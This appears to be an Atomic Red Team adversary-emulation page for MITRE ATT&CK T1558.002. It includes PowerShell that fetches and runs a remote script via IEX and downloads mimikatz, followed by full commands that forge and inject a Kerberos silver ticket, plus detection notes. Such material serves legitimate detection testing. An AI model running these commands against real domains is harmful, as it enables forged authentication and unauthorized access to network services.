# T1558.002 - Silver Ticket
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)

Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)

Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).

## Atomic Tests

### Atomic Test #1 - Crafting Active Directory silver tickets with mimikatz
Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets.
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```

In [ ]:
Invoke-AtomicTest T1558.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Remove-Item $env:TEMP\silver.bat -ErrorAction Ignore
Remove-Item $env:TEMP\silver.txt -ErrorAction Ignore

# get current domain SID if default was used
$domain_sid = "S-1-5-21-DEFAULT"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}

# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to silver.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\silver.txt 2>&1 (
  echo Purge existing tickets and create silver ticket:
  klist purge
  PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:silverticketfakeuser /service:HOST /target:%logonserver:\\=%.%userdnsdomain% /ptt" "exit"

  echo.
  echo executing:schtasks /query /S %logonserver:\\=%.%userdnsdomain%
  schtasks /query /S %logonserver:\\=%.%userdnsdomain%
  
  echo.
  echo Tickets after requesting schtasks:
  klist

  echo.
  echo End of Silver Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat

# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null

# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\silver.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Silver Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used

# show output from new empty session
Get-Content $env:TEMP\silver.txt

# cleanup temp files
Remove-Item $env:TEMP\silver.bat -ErrorAction Ignore
Remove-Item $env:TEMP\silver.txt -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1558.002 -TestNumbers 1

## Detection
Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 

Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.